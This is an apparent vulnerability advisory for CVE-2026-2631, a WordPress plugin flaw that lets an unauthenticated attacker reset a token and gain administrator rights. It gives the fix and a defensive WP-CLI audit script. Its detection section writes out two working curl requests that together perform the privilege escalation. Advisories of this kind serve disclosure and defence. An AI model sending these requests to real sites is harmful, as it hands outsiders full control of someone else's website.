CVE-2026-2631
Status: Received - Intake
Unauthenticated REST Endpoint Allows Admin Role Escalation in Datalogics Ecommerce Plugin

Publication date: 2026-03-11

Last updated on: 2026-03-11

Assigner: WPScan

Description
The Datalogics Ecommerce Delivery WordPress plugin before 2.6.60 exposes an unauthenticated REST endpoint that allows any remote user to modify the option `datalogics_token` without verification. This token is subsequently used for authentication in a protected endpoint that allows users to perform arbitrary WordPress `update_option()` operations. Attackers can use this to enable registration and to set the default role to Administrator.
Meta Information
Published: 2026-03-11
Last Modified: 2026-03-11
Generated: 2026-06-16
AI Q&A: 2026-03-11
EPSS Evaluated: 2026-06-15
Affected Vendors & Products (1 associated CPE)
Vendor: datalogics
Product: ecommerce_delivery_wordpress_plugin
Version / Range: up to 2.6.60 (excluding)
CWE
CWE-269 (Improper Privilege Management): The product does not properly assign, modify, track, or check privileges for an actor, creating an unintended sphere of control for that actor.
Executive Summary

CVE-2026-2631 affects the Datalogics Ecommerce Delivery WordPress plugin versions before 2.6.60. It involves an unauthenticated REST endpoint that allows any remote attacker to modify the `datalogics_token` option without verification.

This token is later used for authentication in a protected endpoint that permits arbitrary execution of WordPress's `update_option()` function. By exploiting this, an attacker can escalate privileges by enabling user registration and setting the default user role to administrator.

This means attackers can create new users who automatically have administrative privileges without any authentication. [1]

Impact Analysis

The vulnerability allows attackers to gain administrative access to a WordPress site by enabling user registration and setting the default role to administrator.

This can lead to full site compromise, including the ability to modify site settings, install malicious plugins, steal sensitive data, or disrupt site operations.

Detection Guidance

This vulnerability can be detected by checking whether the unauthenticated REST endpoint that updates the `datalogics_token` is accessible and can be used to modify plugin options without authentication.

You can use curl commands to test for the vulnerability by attempting to update the token and then checking whether the settings for user registration and the default role can be changed.

- Test updating the token with an unauthenticated POST request:

```
curl -X POST "http://example.com/index.php?rest_route=/datalogics-0/v1/update-token" -H "Content-Type: application/json" -d '{"token":"NXPOC-2026"}'
```

- Attempt to update settings using the token to enable user registration and set the default role to administrator:

```
curl -X POST "http://example.com/index.php?rest_route=/datalogics-0/v1/update-settings" -H "Content-Type: application/json" -d '{ "token":"NXPOC-2026", "settings":{ "users_can_register":"1", "default_role":"administrator" } }'
```

After running these commands, verify in the WordPress admin panel under "Settings > General" whether user registration is enabled and the default role is set to administrator, which indicates the vulnerability is present. [1]

Mitigation Strategies

The immediate mitigation step is to update the Datalogics Ecommerce Delivery WordPress plugin to version 2.6.60 or later, where this vulnerability has been fixed.

Until the update can be applied, consider restricting access to the vulnerable REST endpoints by implementing firewall rules or disabling the plugin if possible.

Additionally, review and reset the `datalogics_token` option and verify that user registration and default role settings have not been maliciously altered.
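The following script is an added example for the review step above; it is not part of the advisory and not code from the plugin vendor. It checks, through WP-CLI, whether the installed plugin is below the fixed version 2.6.60 and whether the site is in the post-exploitation state the advisory describes (open registration with an administrator default role), then lists administrator accounts for manual review. It assumes WP-CLI (`wp`) is installed and is run from the WordPress root; the plugin slug `datalogics-ecommerce-delivery` is an assumption and must be adjusted to the real slug. When `wp` is not available it runs the checks against constructed sample values.

```shell
#!/bin/sh
# Added example (not from the advisory or the plugin vendor): audit a WordPress
# site for the post-exploitation state described for CVE-2026-2631 and check
# whether the plugin is at the fixed version. Assumes WP-CLI ("wp") is installed
# and the script runs from the WordPress root. The plugin slug
# "datalogics-ecommerce-delivery" is an assumption; adjust it to the real one.

FIXED_VERSION="2.6.60"

# version_is_fixed <installed> [<fixed>]: exit 0 when installed >= fixed, comparing
# dot-separated components numerically (2.6.9 < 2.6.60, unlike a string sort).
version_is_fixed() {
  awk -v a="$1" -v b="${2:-$FIXED_VERSION}" 'BEGIN {
    na = split(a, x, "."); nb = split(b, y, ".")
    n = (na > nb) ? na : nb
    for (i = 1; i <= n; i++) {
      xi = (i <= na) ? x[i] + 0 : 0; yi = (i <= nb) ? y[i] + 0 : 0
      if (xi < yi) exit 1
      if (xi > yi) exit 0
    }
    exit 0
  }'
}

# registration_settings_safe <users_can_register> <default_role>: exit 1 when the
# options match the state an attacker leaves behind (open registration with an
# administrator default role), exit 0 otherwise.
registration_settings_safe() {
  if [ "$1" = "1" ] && [ "$2" = "administrator" ]; then
    return 1
  fi
  return 0
}

# audit <version> <users_can_register> <default_role>: prints findings; exits 0
# when nothing is wrong, 1 when at least one finding needs action.
audit() {
  status=0
  if version_is_fixed "$1"; then
    echo "OK: plugin version $1 is at or above $FIXED_VERSION"
  else
    echo "FINDING: plugin version $1 is vulnerable; update to $FIXED_VERSION or later"
    status=1
  fi
  if registration_settings_safe "$2" "$3"; then
    echo "OK: users_can_register=$2 default_role=$3"
  else
    echo "FINDING: open registration with administrator default role (users_can_register=$2 default_role=$3)"
    status=1
  fi
  return $status
}

if command -v wp >/dev/null 2>&1; then
  # Live mode: read the real values through WP-CLI.
  version=$(wp plugin get datalogics-ecommerce-delivery --field=version 2>/dev/null || echo "0")
  can_register=$(wp option get users_can_register)
  default_role=$(wp option get default_role)
  audit "$version" "$can_register" "$default_role"
  # Administrator accounts deserve a manual look: an account registered through an
  # opened registration form would show up here with a recent user_registered date.
  wp user list --role=administrator --fields=ID,user_login,user_registered
  # Recommended follow-up once the site is patched: rotate the plugin token.
  echo "To rotate the token: wp option update datalogics_token \"\$(openssl rand -hex 32)\""
else
  # Offline mode with constructed sample values representing a compromised site.
  audit "2.6.59" "1" "administrator" || echo "sample audit reported findings (expected)"
fi
```

Run it as the web server user (or with `--allow-root` on `wp` where appropriate) so WP-CLI can load the site's configuration. A nonzero exit from `audit` means the site is either unpatched or already shows the altered registration settings, in which case the token rotation and administrator account review should be done alongside the plugin update.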
